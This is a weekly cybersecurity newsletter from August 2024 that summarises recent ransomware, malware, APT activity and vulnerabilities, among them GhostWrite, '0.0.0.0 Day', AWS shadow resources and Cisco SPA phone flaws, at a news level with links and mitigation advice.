• Malware Chronicles
  • Posts
  • City Hall HACKED: North Miami’s Ransomware Fiasco and Data Breach

City Hall HACKED: North Miami’s Ransomware Fiasco and Data Breach

Author

8erg
August 15, 2024

Hi, my fellow malware enthusiast,

Did the same thing happen to you? Were you able to afford the trip, the ticket, the event…? I could not… I really wanted to be there, but I couldn’t…. Yes I’m talking about Black Hat! I mean it’s one of the biggest cybersecurity conferences, it’s a good opportunity to network and meet new people. You know what? Let’s make a bet! Next year I will try to be at either Black Hat or Defcon or both! Maybe we’ll meet each other over there, who knows?

Well, there’s my introduction 😂! Now that we got that out of the way, enjoy this week's newsletter!

📰In today’s newsletter

  • KageNoHitobito: The Ransomware Lurking in the Shadows

  • Threat Actors Hijack Legitimate Anti-Virus Software with SbaProxy Tool

  • GhostWrite: A Critical Flaw in Alibaba's T-Head RISC-V Processors

  • “0.0.0.0 Day”: How Attackers Exploit Browser Flaws for RCE

  • Shadow Resources Exposed: Critical AWS Flaws Revealed

  • Kaspersky's Q2 2024 APT Summary: Key Findings

  • Analyzing BeaverTail Malware: Insights and Protection Strategies

  • Snake Keylogger: An In-Depth Technical Analysis

KageNoHitobito: The Ransomware Lurking in the Shadows

In late March 2024, a new ransomware threat called KageNoHitobito emerged, catching the attention of cybersecurity experts. This ransomware works by locking up files on infected computers and demanding a ransom for their release, as explained in the ransom notes left on the victims’ machines. Unlike some ransomware groups, KageNoHitobito operates through the TOR network to stay anonymous, but they don’t maintain a public website to leak stolen data—suggesting they aren’t interested in stealing or exposing victims' sensitive information.

💡Operating through TOR network, is really a good idea to maintain anonymity, but wait I’m not advocating for it

What makes KageNoHitobito particularly tricky is its use of advanced techniques to avoid detection. It employs methods to sidestep security tools and prevent researchers from analyzing it. To ensure it sticks around, the ransomware makes changes to the system’s registry, guaranteeing it stays active even after a reboot. Interestingly, KageNoHitobito only targets and encrypts files on the infected computer’s local drives, leaving networked drives untouched. Files encrypted by this ransomware can be identified by a unique “.hitobito” extension, making it clear that this malicious software has been at work.

👉For more details checkout this blog.

The Israeli hacktivist group WeRedEvils has claimed responsibility for a major internet outage in Iran. They allege to have breached Iranian systems, stole data, and disrupted key government websites.

This follows their reported attack on Iran’s electricity grid in October 2023. Iranian government sites are currently down, though the full impact and WeRedEvils' actual role remain uncertain.

Threat Actors Hijack Legitimate Anti-Virus Software with SbaProxy Tool

LevelBlue Labs has uncovered a new threat where cybercriminals are hijacking legitimate anti-virus software to conduct undetected malicious activities. The tool behind this attack, named SbaProxy, cleverly disguises itself as genuine anti-virus components, making it extremely difficult to detect. Distributed in various forms like DLLs, EXEs, and PowerShell scripts, SbaProxy establishes proxy connections through a command and control (C&C) server, enabling threat actors to operate stealthily.

What's alarming is the use of valid certificates and modified anti-virus binaries, which allows SbaProxy to bypass security measures easily. This tool not only facilitates malicious activities but could also be sold for profit, posing a significant threat to cybersecurity.

👉Check out the blog to get a more technical overview.

North Miami's Mayor Alix Desulme revealed his personal Gmail was hacked, leading to a ransomware attack that affected city operations. While the city has made some recovery, online services remain down, requiring residents to handle payments in person. The breach potentially exposed sensitive personal information, although it did not target city systems directly. Residents are concerned about both the ongoing service disruption and the security of their personal data.

GhostWrite: A Critical Flaw in Alibaba's T-Head RISC-V Processors

Researchers at Germany's CISPA Helmholtz Center for Information Security have uncovered a severe vulnerability in Alibaba subsidiary T-Head Semiconductor's RISC-V processors. Dubbed GhostWrite, this flaw impacts the T-Head C910 CPU cores within the TH1520 SoC and allows rogue applications or users to gain unauthorized access to physical memory. This enables them to execute arbitrary code with the highest system privileges, effectively taking full control of the affected device.

💡Honestly, I don’t know about you, but I really want to get into hardware exploitation, but I’m not at that level yet😂

The vulnerability arises from faulty vector extension instructions that bypass the memory protection mechanisms of the system, directly accessing physical memory. This flaw cannot be patched with software updates and requires the disabling of the vector extension, which could severely impact performance for applications relying on it. The GhostWrite vulnerability presents a serious risk to systems running on these processors, particularly in environments where unprivileged code can be executed, such as virtual machines or containers.

💡It’s really amazing how a single vulnerability can completely cripple a system. All my best thought to the creators, but I’m amazed!

To better understand and detect such vulnerabilities, the researchers developed a fuzzing framework called RISCVuzz. This tool was instrumental in discovering GhostWrite, as well as other architectural issues in T-Head's chips. The full details of their findings will be presented at the Black Hat security conference, highlighting the potential risks associated with custom implementations of open standards like RISC-V.

👉Want to know more? Dive into the blog for the full scoop!

Earth Baku, an advanced persistent threat (APT) group known since 2021, has broadened its reach to Europe, the Middle East, and Africa. Starting in late 2022, they’ve updated their attack methods, exploiting public-facing IIS servers to infiltrate victims’ networks. Once inside, they deploy advanced tools like StealthVector, StealthReacher, and the new SneakCross backdoor. Their targets span government, telecom, healthcare, and more, with possible activity in countries like Italy, UAE, and Romania. The group is suspected of using MEGAcmd for data theft, making them a significant threat across multiple sectors.

“0.0.0.0 Day”: How Attackers Exploit Browser Flaws for Remote Code Execution

Oligo Security's latest discovery, "0.0.0.0 Day," reveals a serious flaw across major web browsers that allows external websites to bypass security measures and access local network services. This vulnerability, impacting Chromium, Firefox, and Safari, can enable unauthorized remote code execution on local services by exploiting the IP address 0.0.0.0. The issue highlights a significant lapse in browser security and standardization.

Key Points:

  • Vulnerability Overview: The issue arises from inconsistent security mechanisms across browsers, which fail to standardize protection for local network interactions. Attackers can exploit this by sending malicious requests to local services through a browser.

  • Attack Vector: The flaw leverages HTTP requests to localhost APIs, enabling attackers to perform unauthorized activities on local or internal networks. This can lead to data theft, malware deployment, and full control over local services.

  • Technical Details: Browsers’ handling of HTTP requests has lacked consistent security controls, especially for requests targeting local or internal networks. Despite Cross-Origin Resource Sharing (CORS) and the newer Private Network Access (PNA) standard aimed at mitigating these risks, attackers have managed to bypass these protections by targeting the 0.0.0.0 address.

  • Proof of Concept: Researchers demonstrated this vulnerability by executing the ShadowRay attack via the 0.0.0.0 vector, showing how it could be used for arbitrary code execution. This attack exploits local services and can compromise a system through a single HTTP request.

  • Mitigation: Browser vendors like Google, Apple, and Mozilla are working on fixes. For immediate protection, network administrators should:

    • Implement PNA headers and verify the HOST header to guard against DNS rebinding attacks.

    • Use HTTPS over HTTP and include CSRF tokens in local applications.

    • Apply minimal authorization even for local services to prevent unauthorized access.

👉Want to know more? you can read the blog about it!

Shadow Resources Exposed: Critical AWS Flaws Revealed

Aqua Security researchers have uncovered six critical vulnerabilities in AWS services, revealed at Black Hat USA 2024. Dubbed "shadow resources," these flaws affect AWS CloudFormation, CodeStar, and Service Catalog. The vulnerabilities could lead to full account takeovers and data breaches.

Key Findings

  1. Shadow Resources: Researchers discovered that AWS automatically creates S3 buckets for CloudFormation templates using predictable names based on region and account ID. This could allow attackers to preemptively create and control these buckets.

  2. Bucket Monopoly: Attackers can exploit predictable bucket names to set up malicious buckets before AWS creates them, potentially capturing sensitive data intended for legitimate buckets.

  3. Exploitation Techniques: Attackers could use AWS Lambda to access and modify CloudFormation templates in these malicious buckets, potentially adding malicious roles and gaining administrative access.

The vulnerabilities highlight new attack vectors and underscore the need for enhanced security measures in cloud services.

👉For additional intel on it, read here.

Seqrite Labs recently uncovered multiple global campaigns using fake PayPal receipt documents to deliver a new variant of ransomware called Cronus. This PowerShell-based malware is particularly stealthy, executing directly in memory without leaving a trace on the disk. The attack begins with a malicious document named paypal_charges.doc, which contains VBA macros designed to download a secondary PowerShell loader. This loader then employs reflective DLL loading to deploy the ransomware, a technique previously seen in attacks by groups like NETWALKER. The use of these advanced tactics highlights the increasing sophistication of ransomware campaigns. For a technical analysis on it, read more here.

Kaspersky's Q2 2024 APT Summary: Key Findings

A critical Linux supply chain attack involving a backdoor in the liblzma library used in the XZ compression utility targeted OpenSSH servers, exploiting a CVE-2024-3094 vulnerability with a severity score of 10.

Significant developments include the ToddyCat APT group's upgraded PcExter 2.0 exfiltration tool and the CloudComputating group's new tools targeting ISPs in West Asia. The Gaza Cybergang has refined its tactics in the Middle East, while the Mysterious Elephant threat actor in Southeast Asia introduces new malware families.

Hacktivist groups -=Twelve=- and Homeland Justice are active in the Russian-Ukrainian conflict and Albanian targets, respectively. Other notable discoveries include the Aniseed Vodka Framework in East Africa, DinodasRAT's Linux variant, CloudSorcerer malware, and the Telemos Backdoor.

💡These APT group’s never sleep😂

👉Want to know more? you can read about it, here!

Analyzing BeaverTail Malware: Insights and Protection Strategies

In the aftermath of the August 7, 2024, security breach, Nexera Fundrs offers a detailed analysis of the BeaverTail malware involved in the attack. The breach began with attackers posing as consultants on LinkedIn, leading a staff member to a GitHub repository containing malicious code disguised as a game.

Upon execution, BeaverTail, a Javascript-based malware within Node Package Manager (NPM) packages, initiated a local web server and communicated with a command and control (C&C) server. The malware exfiltrated sensitive data, including browser credentials and wallet details, and deployed a backdoor named InvisibleFerret to capture keystrokes and remotely control the infected machine.

While the attackers compromised wallet credentials, multi-factor authentication (MFA) and swift response measures mitigated further damage. Defensive strategies include verifying LinkedIn profiles, using updated anti-malware tools, isolating suspicious code in virtual machines, and enhancing account and wallet security with MFA and hardware wallets.

👉Want to know more? you can read about it, here!

Cisco has revealed five significant vulnerabilities in its SPA 300 and SPA 500 IP phones, including three critical flaws and two high-severity issues. Here's what you need to know:

  • Critical Vulnerabilities (CVSS v3.1 Score: 9.8):

    • CVE-2024-20450, CVE-2024-20452, CVE-2024-20454: These buffer overflow vulnerabilities enable unauthenticated, remote attackers to send specially crafted HTTP requests that overflow internal buffers. This can grant them root-level access, allowing full control over the device's operating system.

  • High-Severity Vulnerabilities (CVSS v3.1 Score: 7.5):

    • CVE-2024-20451, CVE-2024-20453: These flaws result from insufficient checks on HTTP packets, which can lead to a denial of service (DoS) on the affected devices.

Cisco emphasizes that all five vulnerabilities affect every software release for the SPA 300 and SPA 500 IP phones, regardless of configuration. Each flaw can be exploited independently, posing significant risks.

For detailed guidance on mitigating these vulnerabilities, refer to Cisco's security bulletin.

Snake Keylogger: An In-Depth Technical Analysis

Snake Keylogger, a formidable credential stealer first detected in November 2020, is written in .NET and designed for covert operations. Distributed primarily through phishing campaigns that exploit document vulnerabilities, this malware can log keystrokes, steal saved credentials, capture screenshots, and harvest clipboard data. Its infection process often involves phishing emails with malicious Office documents or PDFs that, when opened, trigger the malware via PowerShell scripts.

💡Here we go again! ding! ding! ding! We have a winner, Microsoft! Thank you for helping them fool us again…Just joking😂

Snake Keylogger is adept at evading detection, using encrypted channels for data exfiltration and deploying additional malicious components remotely. The analysis delves into its operation, distribution tactics, and embedded malicious content, offering strategies to detect, prevent, and mitigate its threat. Key mitigation strategies include user education on phishing risks, up-to-date anti-malware tools, vigilant network monitoring, and regular software patching to close vulnerabilities.

👉Want to know more? you can read about it, here!

✉️ Wrapping Up

In the world of malware, understanding is key. As we delve into these threats together, remember that knowledge and vigilance are our best allies.

If you find this newsletter helpful and know others who might benefit from it, I'd be grateful if you could pass it along. 🙏

Until next time, stay informed and keep your defenses sharp. Here’s to staying one step ahead

Thanks for reading!